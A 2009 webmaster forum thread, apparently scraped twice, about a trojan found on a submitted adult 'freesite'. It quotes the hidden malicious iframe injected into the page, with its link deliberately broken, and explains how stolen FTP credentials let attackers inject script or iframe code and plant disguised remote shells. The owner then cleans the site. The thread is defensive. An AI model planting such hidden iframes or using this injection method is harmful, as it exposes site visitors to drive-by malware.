Trojan on freesite

hincapie · 2009-06-16, 11:28 AM

I was checking some freesites submitted to me - and this one made my trojan alerter go nuts: http://paintortures.com/16-06/

Take care

Wazza · 2009-06-16, 03:38 PM

It is the main page that is the issue

Contains the following

Code:

iframe src="http://meldor[inserted to kill link]group.cn:8080/ts/in.cgi?pepsi67" width=125 height=125 style="visibility: hidden"

The wms ref code is

slavesinlove.com/cgi-bin/click.cgi?id=dejavu

I know I've seen dejavu before...

cd34 · 2009-06-16, 03:47 PM

iframe after <body> -- ftp account was most likely compromised.

Wazza · 2009-06-16, 04:00 PM

Odd that it's not on all html pages... the index is clean... but the main page, the one that is less likely to get scanned by a linkbot has the code...

nate · 2009-06-16, 09:11 PM

Quote:

ftp account was most likely compromised.

you say that a lot. why so?

cd34 · 2009-06-16, 09:56 PM

Quote:

Originally Posted by nate

you say that a lot. why so?

There are a few types of exploits that are out there. A web exploit or an FTP exploit are the two most common.

With the FTP exploit, a person's FTP user/password data is compromised and passed off to a cluster of machines. Those machines then go in with the FTP credentials and download every .html and .php file and replace <body> with <body><script exploit code> or <body><iframe exploit code>. Within a few hours, that cluster of servers will have modified as many pages as they can. Other machines in there will try to determine actual usable URLs and will inject remote shells that mimic existing files. You might have DSC003049.jpg in a directory and the exploit server might inject DSC003049.php. Those urls are then cataloged for later attempts at spam & DDOS work.

Most web exploits don't modify dozens of files and usually just inject a script that allows remote access. Usually it is modification of a template or file so that they can later run remote shells or scripts, or, depending on the hole in the application, they may upload files into directories for later use. Not to say that they couldn't modify a number of files, it depends on how the server is set up.

If the host runs setuid or suexec, a compromised web script runs as the same userid as the FTP account and therefore all files can be modified. With FTP, you're almost guaranteed that every file you can see in FTP can be modified. From a return on investment standpoint, with an FTP account you are more likely to have more pages modified. More pages means more surfers potentially exploited which means more zombies/toolbars/etc.

However, the exploit listed above has about a 99% chance of being from an exploited FTP password.

dejavu · 2009-06-17, 12:04 PM

Hello 2all!
Thanks for alert, this is really trojan at the my server!
I have been delete from this page and change FTP information...
I will find this code also at pages now and clean
Thanks

dejavu · 2009-06-17, 03:12 PM

All fixed and iframes removed from the server.
Thanks again...

stuveltje · 2009-06-18, 01:15 PM

ah so that was a trojan?, my puter freezed when i was checking your site on the main page, dejavu..nothing further happend, the page frooze i could close it and go further without rebooting, seems i finally have the right stuf to protect myself.

oh and yeah it was an reason to reject your site, but i didnt blacklist it

2009-06-16, 11:28 AM	#1
hincapie You can now put whatever you want in this space :) Join Date: Aug 2005 Location: Cyprus Posts: 963	Trojan on freesite I was checking some freesites submitted to me - and this one made my trojan alerter go nuts: http://paintortures.com/16-06/ Take care __________________ Hinc Linklists/TGPs: Adult List Loasex.com

2009-06-16, 03:38 PM	#2
Wazza I'm a jaded evil bastard, I wouldn't piss on myself if I was on fire... Join Date: Apr 2003 Location: Melbourne, Australia Posts: 808	It is the main page that is the issue Contains the following Code: iframe src="http://meldor[inserted to kill link]group.cn:8080/ts/in.cgi?pepsi67" width=125 height=125 style="visibility: hidden" The wms ref code is slavesinlove.com/cgi-bin/click.cgi?id=dejavu I know I've seen dejavu before... __________________ I sale Internet My sites have no traffic and no PR - let's trade - PM me

2009-06-16, 03:47 PM	#3
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	iframe after <body> -- ftp account was most likely compromised. __________________ SnapReplay.com a different way to share photos - iPhone & Android

2009-06-16, 04:00 PM	#4
Wazza I'm a jaded evil bastard, I wouldn't piss on myself if I was on fire... Join Date: Apr 2003 Location: Melbourne, Australia Posts: 808	Odd that it's not on all html pages... the index is clean... but the main page, the one that is less likely to get scanned by a linkbot has the code... __________________ I sale Internet My sites have no traffic and no PR - let's trade - PM me

2009-06-18, 01:15 PM	#9
stuveltje Live and learn. And take very careful notes! Join Date: Apr 2003 Location: Sunny Holland Posts: 6,157	ah so that was a trojan?, my puter freezed when i was checking your site on the main page, dejavu..nothing further happend, the page frooze i could close it and go further without rebooting, seems i finally have the right stuf to protect myself. oh and yeah it was an reason to reject your site, but i didnt blacklist it __________________ Canadian Sexlinks - submit Erotica search -submit

2009-06-17, 12:04 PM	#7
dejavu Internet! Is that thing still around? Join Date: Aug 2008 Posts: 3	Hello 2all! Thanks for alert, this is really trojan at the my server! I have been delete from this page and change FTP information... I will find this code also at pages now and clean Thanks

2009-06-17, 03:12 PM	#8
dejavu Internet! Is that thing still around? Join Date: Aug 2008 Posts: 3	All fixed and iframes removed from the server. Thanks again...